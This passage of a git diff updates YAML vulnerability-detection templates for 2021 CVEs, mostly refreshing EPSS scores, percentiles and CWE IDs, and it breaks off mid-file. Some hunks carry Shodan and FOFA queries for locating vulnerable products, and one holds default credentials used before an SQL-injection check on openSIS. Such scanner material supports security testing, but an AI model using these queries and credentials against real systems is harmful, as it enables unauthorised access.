--- a/http/cves/2021/CVE-2021-41174.yaml
+++ b/http/cves/2021/CVE-2021-41174.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-41174
cwe-id: CWE-79
- epss-score: 0.96376
+ epss-score: 0.96462
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99384
metadata:
max-request: 1
shodan-query: title:"Grafana"
diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml
index 2d80f68ac7..786a12e687 100644
--- a/http/cves/2021/CVE-2021-41192.yaml
+++ b/http/cves/2021/CVE-2021-41192.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-41192
cwe-id: CWE-1188
- epss-score: 0.00499
+ epss-score: 0.00805
cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*
+ epss-percentile: 0.79527
metadata:
max-request: 2
shodan-query: http.favicon.hash:698624197
diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml
index f1d56f80a2..ca7f8c0349 100644
--- a/http/cves/2021/CVE-2021-41266.yaml
+++ b/http/cves/2021/CVE-2021-41266.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-41266
cwe-id: CWE-306
- epss-score: 0.05608
+ epss-score: 0.04636
cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:*
+ epss-percentile: 0.91526
metadata:
max-request: 1
vendor: min
diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml
index 37e2a0716d..8ae375608a 100644
--- a/http/cves/2021/CVE-2021-41277.yaml
+++ b/http/cves/2021/CVE-2021-41277.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-41277
- cwe-id: CWE-20,CWE-200
- epss-score: 0.967
+ cwe-id: CWE-200,CWE-22
+ epss-score: 0.95953
cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:*
+ epss-percentile: 0.99232
metadata:
max-request: 1
fofa-query: app="Metabase"
diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml
index dba6d55e6c..a7ab3e8702 100644
--- a/http/cves/2021/CVE-2021-41282.yaml
+++ b/http/cves/2021/CVE-2021-41282.yaml
@@ -19,8 +19,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-41282
cwe-id: CWE-74
- epss-score: 0.97396
+ epss-score: 0.97136
cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:*
+ epss-percentile: 0.99688
metadata:
max-request: 4
vendor: pfsense
diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml
index 83e774034b..793f16aba3 100644
--- a/http/cves/2021/CVE-2021-41291.yaml
+++ b/http/cves/2021/CVE-2021-41291.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-41291
cwe-id: CWE-22
- epss-score: 0.09024
+ epss-score: 0.11826
cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.94586
metadata:
max-request: 1
vendor: ecoa
diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml
index 7259b35d58..5d748b42e0 100644
--- a/http/cves/2021/CVE-2021-41293.yaml
+++ b/http/cves/2021/CVE-2021-41293.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-41293
cwe-id: CWE-22
- epss-score: 0.09024
+ epss-score: 0.11826
cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.94586
metadata:
max-request: 1
vendor: ecoa
diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml
index 813c19f519..a68643e91a 100644
--- a/http/cves/2021/CVE-2021-41349.yaml
+++ b/http/cves/2021/CVE-2021-41349.yaml
@@ -15,8 +15,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-41349
- epss-score: 0.96427
+ epss-score: 0.96426
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
+ epss-percentile: 0.99374
metadata:
max-request: 1
vendor: microsoft
diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml
index 7713b44646..12bbb31b48 100644
--- a/http/cves/2021/CVE-2021-41381.yaml
+++ b/http/cves/2021/CVE-2021-41381.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-41381
cwe-id: CWE-22
- epss-score: 0.04023
+ epss-score: 0.04909
cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:*
+ epss-percentile: 0.91773
metadata:
max-request: 1
vendor: payara
diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml
index a9d0d62d2d..c9e818bead 100644
--- a/http/cves/2021/CVE-2021-41432.yaml
+++ b/http/cves/2021/CVE-2021-41432.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00084
cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.34562
metadata:
max-request: 4
shodan-query: http.html:"Flatpress"
diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml
index 8b1ed2faf3..b327c80398 100644
--- a/http/cves/2021/CVE-2021-41460.yaml
+++ b/http/cves/2021/CVE-2021-41460.yaml
@@ -10,13 +10,20 @@ info:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-58823
- https://nvd.nist.gov/vuln/detail/CVE-2021-41460
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
cve-id: CVE-2021-41460
+ cwe-id: CWE-89
+ epss-score: 0.01115
+ cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82751
metadata:
max-request: 1
verified: true
fofa-query: product="ECShop"
+ vendor: shopex
+ product: ecshop
tags: cve,cve2021,cnvd,cnvd2020,ecshop,sqli
-
variables:
num: "999999999"
diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml
index f0b8fad5f6..825cbd12b8 100644
--- a/http/cves/2021/CVE-2021-41467.yaml
+++ b/http/cves/2021/CVE-2021-41467.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-41467
cwe-id: CWE-79
- epss-score: 0.00143
+ epss-score: 0.00138
cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.48606
metadata:
max-request: 1
vendor: justwriting_project
diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml
index 1ce26016c9..64c2765b76 100644
--- a/http/cves/2021/CVE-2021-41569.yaml
+++ b/http/cves/2021/CVE-2021-41569.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-829
epss-score: 0.00978
cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:*
+ epss-percentile: 0.81497
metadata:
max-request: 1
vendor: sas
diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml
index bd477954e0..fdde12722b 100644
--- a/http/cves/2021/CVE-2021-41648.yaml
+++ b/http/cves/2021/CVE-2021-41648.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-41648
cwe-id: CWE-89
- epss-score: 0.03094
+ epss-score: 0.04318
cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:*
+ epss-percentile: 0.91227
metadata:
max-request: 1
vendor: online-shopping-system-advanced_project
diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml
index 08bb10cbdc..f2f70aa26f 100644
--- a/http/cves/2021/CVE-2021-41649.yaml
+++ b/http/cves/2021/CVE-2021-41649.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-41649
cwe-id: CWE-89
- epss-score: 0.02803
+ epss-score: 0.03215
cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:*
+ epss-percentile: 0.89928
metadata:
max-request: 1
vendor: online-shopping-system-advanced_project
diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml
index 5d7364a949..f5863483f8 100644
--- a/http/cves/2021/CVE-2021-41653.yaml
+++ b/http/cves/2021/CVE-2021-41653.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-41653
cwe-id: CWE-94
- epss-score: 0.94766
+ epss-score: 0.95457
cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99108
metadata:
max-request: 2
vendor: tp-link
diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml
index e4ebd36140..5f0d078822 100644
--- a/http/cves/2021/CVE-2021-41691.yaml
+++ b/http/cves/2021/CVE-2021-41691.yaml
@@ -11,10 +11,9 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169
classification:
cve-id: CVE-2021-41691
- tags: sqli,auth,edb,cve,cve2021,opensis
metadata:
max-request: 2
-
+ tags: sqli,auth,edb,cve,cve2021,opensis
variables:
num: "999999999"
@@ -27,7 +26,6 @@ http:
Content-Type: application/x-www-form-urlencoded
USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
-
- |
POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
Host: {{Hostname}}
@@ -40,10 +38,8 @@ http:
payloads:
username:
- student
-
password:
- student@123
-
req-condition: true
cookie-reuse: true
matchers:
diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml
index 86b8498c05..72914709ae 100644
--- a/http/cves/2021/CVE-2021-41773.yaml
+++ b/http/cves/2021/CVE-2021-41773.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-22
epss-score: 0.97532
cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*
+ epss-percentile: 0.99986
metadata:
max-request: 3
shodan-query: Apache 2.4.49
diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml
index 287bd1b5c7..3d65c97eae 100644
--- a/http/cves/2021/CVE-2021-41826.yaml
+++ b/http/cves/2021/CVE-2021-41826.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-601
epss-score: 0.93913
cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:*
+ epss-percentile: 0.988
metadata:
max-request: 1
vendor: place
diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml
index 73585d98e7..762c9f9495 100644
--- a/http/cves/2021/CVE-2021-41878.yaml
+++ b/http/cves/2021/CVE-2021-41878.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00476
cpe: cpe:2.3:a:hkurl:i-panel_administration_system:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.72656
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml
index 67e286301a..bb1e8ebefb 100644
--- a/http/cves/2021/CVE-2021-4191.yaml
+++ b/http/cves/2021/CVE-2021-4191.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-4191
cwe-id: CWE-287
- epss-score: 0.74106
+ epss-score: 0.46947
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
+ epss-percentile: 0.96965
metadata:
max-request: 1
vendor: gitlab
diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml
index 91e3761d8f..95490c3903 100644
--- a/http/cves/2021/CVE-2021-41951.yaml
+++ b/http/cves/2021/CVE-2021-41951.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.74732
cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97725
metadata:
max-request: 1
vendor: montala
diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml
index 0e7714cf99..3b003e12a5 100644
--- a/http/cves/2021/CVE-2021-42013.yaml
+++ b/http/cves/2021/CVE-2021-42013.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: "CVE-2021-42013"
cwe-id: CWE-22
- epss-score: 0.97514
+ epss-score: 0.97515
cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*
+ epss-percentile: 0.99973
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml
index 414f6cf892..78533e9120 100644
--- a/http/cves/2021/CVE-2021-42063.yaml
+++ b/http/cves/2021/CVE-2021-42063.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-42063
cwe-id: CWE-79
- epss-score: 0.00346
+ epss-score: 0.00377
cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:*
+ epss-percentile: 0.69374
metadata:
max-request: 1
shodan-query: http.favicon.hash:-266008933
diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml
index e455e406f9..73ae9a238e 100644
--- a/http/cves/2021/CVE-2021-42071.yaml
+++ b/http/cves/2021/CVE-2021-42071.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-42071
cwe-id: CWE-78
- epss-score: 0.95544
+ epss-score: 0.9564
cpe: cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99153
metadata:
max-request: 1
vendor: visual-tools
diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml
index d12b37a803..f703b36982 100644
--- a/http/cves/2021/CVE-2021-42192.yaml
+++ b/http/cves/2021/CVE-2021-42192.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-863
epss-score: 0.0106
cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:*
+ epss-percentile: 0.82302
metadata:
max-request: 3
vendor: konga_project
diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml
index 9cdb5f2832..cfb3c3d952 100644
--- a/http/cves/2021/CVE-2021-42237.yaml
+++ b/http/cves/2021/CVE-2021-42237.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-42237
cwe-id: CWE-502
- epss-score: 0.97543
+ epss-score: 0.97532
cpe: cpe:2.3:a:sitecore:experience_platform:7.5:-:*:*:*:*:*:*
+ epss-percentile: 0.99984
metadata:
max-request: 1
shodan-query: http.title:"SiteCore"
diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml
index 8bedaf8481..7c99b15d17 100644
--- a/http/cves/2021/CVE-2021-42258.yaml
+++ b/http/cves/2021/CVE-2021-42258.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-42258
cwe-id: CWE-89
- epss-score: 0.97451
+ epss-score: 0.97388
cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99868
metadata:
max-request: 2
vendor: bqe
diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml
index 969fafc35d..1f693a97b5 100644
--- a/http/cves/2021/CVE-2021-42551.yaml
+++ b/http/cves/2021/CVE-2021-42551.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-42551
cwe-id: CWE-79
- epss-score: 0.00165
+ epss-score: 0.00124
cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:*
+ epss-percentile: 0.46073
metadata:
max-request: 2
vendor: alcoda
diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml
index d362d62306..ead8cefdc8 100644
--- a/http/cves/2021/CVE-2021-42565.yaml
+++ b/http/cves/2021/CVE-2021-42565.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40864
metadata:
max-request: 2
vendor: myfactory
diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml
index 45576618fd..fe6e3520ea 100644
--- a/http/cves/2021/CVE-2021-42566.yaml
+++ b/http/cves/2021/CVE-2021-42566.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40864
metadata:
max-request: 2
vendor: myfactory
diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml
index d99956030e..17a28d661d 100644
--- a/http/cves/2021/CVE-2021-42567.yaml
+++ b/http/cves/2021/CVE-2021-42567.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.25981
cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:*
+ epss-percentile: 0.961
metadata:
max-request: 1
shodan-query: http.title:'CAS - Central Authentication Service'
diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml
index 41b788816c..0ffb964cfd 100644
--- a/http/cves/2021/CVE-2021-42627.yaml
+++ b/http/cves/2021/CVE-2021-42627.yaml
@@ -16,8 +16,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-42627
- epss-score: 0.02865
+ epss-score: 0.05762
cpe: cpe:2.3:o:dlink:dir-615_firmware:20.06:*:*:*:*:*:*:*
+ epss-percentile: 0.92386
metadata:
max-request: 1
shodan-query: http.title:"Roteador Wireless"
diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml
index 7093dfa21d..9e7b70772a 100644
--- a/http/cves/2021/CVE-2021-42663.yaml
+++ b/http/cves/2021/CVE-2021-42663.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.44596
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml
index f95d0abd91..148fda23d9 100644
--- a/http/cves/2021/CVE-2021-42667.yaml
+++ b/http/cves/2021/CVE-2021-42667.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-42667
cwe-id: CWE-89
- epss-score: 0.01846
+ epss-score: 0.02869
cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.89414
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml
index e05e6b2553..d12c18dee8 100644
--- a/http/cves/2021/CVE-2021-42887.yaml
+++ b/http/cves/2021/CVE-2021-42887.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-42887
cwe-id: CWE-287
- epss-score: 0.01788
+ epss-score: 0.01827
cpe: cpe:2.3:o:totolink:ex1200t_firmware:4.1.2cu.5215:*:*:*:*:*:*:*
+ epss-percentile: 0.86733
metadata:
max-request: 2
shodan-query: title:"TOTOLINK"
diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml
index 65f78aa40d..e25b36a6a3 100644
--- a/http/cves/2021/CVE-2021-43062.yaml
+++ b/http/cves/2021/CVE-2021-43062.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-43062
cwe-id: CWE-79
- epss-score: 0.00303
+ epss-score: 0.00465
cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72371
metadata:
max-request: 1
vendor: fortinet
diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml
index df1fb96517..96ac4cb8f3 100644
--- a/http/cves/2021/CVE-2021-43287.yaml
+++ b/http/cves/2021/CVE-2021-43287.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-43287
cwe-id: CWE-200
- epss-score: 0.67663
+ epss-score: 0.70378
cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97594
metadata:
max-request: 1
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml
index da2db5ef77..b64e238573 100644
--- a/http/cves/2021/CVE-2021-43421.yaml
+++ b/http/cves/2021/CVE-2021-43421.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-434
epss-score: 0.02563
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88849
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml
index 47d3cac009..61c85abf76 100644
--- a/http/cves/2021/CVE-2021-43495.yaml
+++ b/http/cves/2021/CVE-2021-43495.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-22
epss-score: 0.05064
cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:*
+ epss-percentile: 0.91909
metadata:
max-request: 1
vendor: alquistai
diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml
index c457eb4ba1..6dc7fd0f6c 100644
--- a/http/cves/2021/CVE-2021-43496.yaml
+++ b/http/cves/2021/CVE-2021-43496.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-22
epss-score: 0.05064
cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:*
+ epss-percentile: 0.91909
metadata:
max-request: 1
vendor: clustering_project
diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml
index 23be13420b..2eb88af712 100644
--- a/http/cves/2021/CVE-2021-43510.yaml
+++ b/http/cves/2021/CVE-2021-43510.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-43510
cwe-id: CWE-89
- epss-score: 0.01198
+ epss-score: 0.01901
cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.87048
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml
index 9d87eff78d..72bce40fec 100644
--- a/http/cves/2021/CVE-2021-43574.yaml
+++ b/http/cves/2021/CVE-2021-43574.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00145
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.49646
metadata:
max-request: 3
shodan-query: http.html:"Powered by Atmail"
diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml
index 01f6e24a52..6c1126d8c6 100644
--- a/http/cves/2021/CVE-2021-43725.yaml
+++ b/http/cves/2021/CVE-2021-43725.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-43725
cwe-id: CWE-79
- epss-score: 0.00148
+ epss-score: 0.0016
cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51978
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml
index 0d2055596a..89c09b2a93 100644
--- a/http/cves/2021/CVE-2021-43734.yaml
+++ b/http/cves/2021/CVE-2021-43734.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-43734
cwe-id: CWE-22
- epss-score: 0.00536
+ epss-score: 0.02295
cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.88264
metadata:
max-request: 2
shodan-query: http.html:"kkFileView"
diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml
index c76833e2b0..67fbb8b15a 100644
--- a/http/cves/2021/CVE-2021-43778.yaml
+++ b/http/cves/2021/CVE-2021-43778.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-43778
cwe-id: CWE-22
- epss-score: 0.64298
+ epss-score: 0.75886
cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97757
metadata:
max-request: 1
vendor: glpi-project
diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml
index c1d7dcac9a..020cfe4c2e 100644
--- a/http/cves/2021/CVE-2021-43798.yaml
+++ b/http/cves/2021/CVE-2021-43798.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-43798
cwe-id: CWE-22
- epss-score: 0.97473
+ epss-score: 0.97484
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9995
metadata:
max-request: 3
verified: "true"
diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml
index 1da413932e..c93dc76f0d 100644
--- a/http/cves/2021/CVE-2021-43810.yaml
+++ b/http/cves/2021/CVE-2021-43810.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-43810
cwe-id: CWE-79
- epss-score: 0.00376
+ epss-score: 0.00513
cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*
+ epss-percentile: 0.73678
metadata:
max-request: 1
vendor: admidio
diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml
index 18d348a80c..e7bfd1585a 100644
--- a/http/cves/2021/CVE-2021-44077.yaml
+++ b/http/cves/2021/CVE-2021-44077.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44077
- cwe-id: CWE-287
- epss-score: 0.97363
+ cwe-id: CWE-306
+ epss-score: 0.97373
cpe: cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:*
+ epss-percentile: 0.99854
metadata:
max-request: 1
vendor: zohocorp
diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml
index 9aabaf8681..8c994213e2 100644
--- a/http/cves/2021/CVE-2021-44138.yaml
+++ b/http/cves/2021/CVE-2021-44138.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-44138
cwe-id: CWE-22
- epss-score: 0.00472
+ epss-score: 0.00867
cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80249
metadata:
max-request: 2
shodan-query: html:"Resin"
diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml
index 758167dc58..584ea98a81 100644
--- a/http/cves/2021/CVE-2021-44139.yaml
+++ b/http/cves/2021/CVE-2021-44139.yaml
@@ -13,10 +13,14 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-44139
cwe-id: CWE-918
+ epss-score: 0.00769
cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:*
+ epss-percentile: 0.78983
metadata:
max-request: 1
shodan-query: title:"Sentinel Dashboard"
+ vendor: hashicorp
+ product: sentinel
tags: cve,cve2021,ssrf,alibaba,oast,misconfig,sentinel
http:
diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml
index dde2a51d4a..4e1956e3ba 100644
--- a/http/cves/2021/CVE-2021-44152.yaml
+++ b/http/cves/2021/CVE-2021-44152.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44152
- cwe-id: CWE-287
- epss-score: 0.25951
